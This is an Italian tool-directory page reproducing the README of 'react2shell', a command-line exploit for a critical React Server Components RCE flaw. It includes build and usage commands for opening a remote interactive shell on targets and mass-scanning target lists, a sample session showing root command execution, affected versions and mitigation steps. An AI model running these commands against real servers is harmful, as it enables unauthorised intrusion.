Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react2shell — Uno strumento da riga di comando che sfrutta vulnerabilità nei React Server Components e nelle Server Actions (CVE-2025-55182, CVE-2025-66478) per ottenere l'esecuzione remota di codice (RCE) su server vulnerabili. | Kitploit
Strumenti/GitHubGitHub/mantvmass/react2shell
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoArchived
GitHubmantvmass/react2shell

react2shell

Uno strumento da riga di comando che sfrutta vulnerabilità nei React Server Components e nelle Server Actions (CVE-2025-55182, CVE-2025-66478) per ottenere l'esecuzione remota di codice (RCE) su server vulnerabili.

Vedi Repository
28 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

React2Shell

Uno strumento CLI per sfruttare le vulnerabilità di prototype pollution nei React Server Components / Server Actions (CVE-2025-55182 & CVE-2025-66478), consentendo l'esecuzione remota di codice (RCE) su server vulnerabili.

PoC originale : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

ATTENZIONE: Questo strumento prende di mira una vulnerabilità critica (CVSS 10.0) attivamente sfruttata in natura. Usalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test.

Disclaimer legale

Questo strumento è destinato esclusivamente a scopi educativi, test di sicurezza autorizzati, penetration testing con permesso e ricerca sulle vulnerabilità.

L'autore e i contributori declinano ogni responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante dall'uso di questo strumento. Sei pienamente responsabile di garantire che il tuo utilizzo sia conforme a tutte le leggi, regolamenti e termini di servizio applicabili.

L'uso non autorizzato contro sistemi senza permesso è illegale nella maggior parte delle giurisdizioni e può comportare severe sanzioni.

Installazione

Dal sorgente

root@kitploit:~
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release

Il binario si troverà in target/release/react2shell (o react2shell.exe su Windows).

Binari precompilati

Scarica dalla pagina Releases.

Utilizzo

root@kitploit:~
react2shell [COMMAND] [SOURCE]

Comandi

  • open <URL>: Apre una shell inversa interattiva sul target (se vulnerabile).
  • scan <FILE>: Scansiona una lista di target da un file (un URL per riga) per verificarne la vulnerabilità.

Esempi

root@kitploit:~
# Open interactive shell
react2shell open http://vulnerable-target.com

# Scan multiple targets
react2shell scan targets.txt

# Scan single target
react2shell scan http://127.0.0.1:3000

Esempi di shell interattiva

root@kitploit:~
[email protected]:3000 (js)
$ /help                                                    # Display all supported commands
Commands;
  /new <URL> ; Switch URL target                           # Switch URL target
  /use exec ; Execute command and wait for output          # Switch to exec mode (waits for result)
  /use exec-no-wait ; Execute command without waiting      # Exec mode without waiting for output
  /use js ; Execute JavaScript code                        # Switch back to JavaScript mode
  /set timeout <ms> ; Set command timeout in milliseconds  # Configure command timeout
  /show options ; Show current configuration               # Display current shell settings
  /clear ; Clear screen                                    # Clear the terminal screen
  /exit or /quit ; Exit the shell                          # Exit the interactive shell

Examples;
  ls -la                                                 # Example Linux command
  whoami                                                 # Show current system user
  console.log('Hello')                                   # Example JavaScript command

[email protected]:3000 (js)
$ /use exec                                              # Switch from JS mode to exec mode
[+] Switch shell mode to exec

[email protected]:3000 (exec)
$ whoami                                                 # Verify current execution user
root                                                     # Command output

Versioni affette

Next.js

Le applicazioni che utilizzano React Server Components con App Router sono affette se eseguono le seguenti versioni:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 e successive versioni canary

Le seguenti non sono affette:

  • Next.js 13.x
  • Next.js 14.x (versioni stabili)
  • Applicazioni che utilizzano Pages Router
  • Implementazioni Edge Runtime

React

La vulnerabilità esiste nelle versioni di React 19.0, 19.1.0, 19.1.1 e 19.2.0 nei seguenti pacchetti:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

Si raccomanda vivamente l'aggiornamento immediato alle versioni corrette, specialmente per ambienti di produzione.

Mitigazione

La soluzione principale è aggiornare alle versioni corrette di React e Next.js.

Per le applicazioni Next.js, utilizza il fixer automatico ufficiale:

root@kitploit:~
npx fix-react2shell-next

Maggiori info: vercel-labs/fix-react2shell-next

Vedi gli avvisi ufficiali:

  • React: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • Next.js: https://nextjs.org/blog/CVE-2025-66478

Licenza

Questo progetto è rilasciato esclusivamente a scopo educativo e per ricerca di sicurezza autorizzata. Ogni responsabilità per l'uso ricade sull'utente finale.

Scarica lo strumento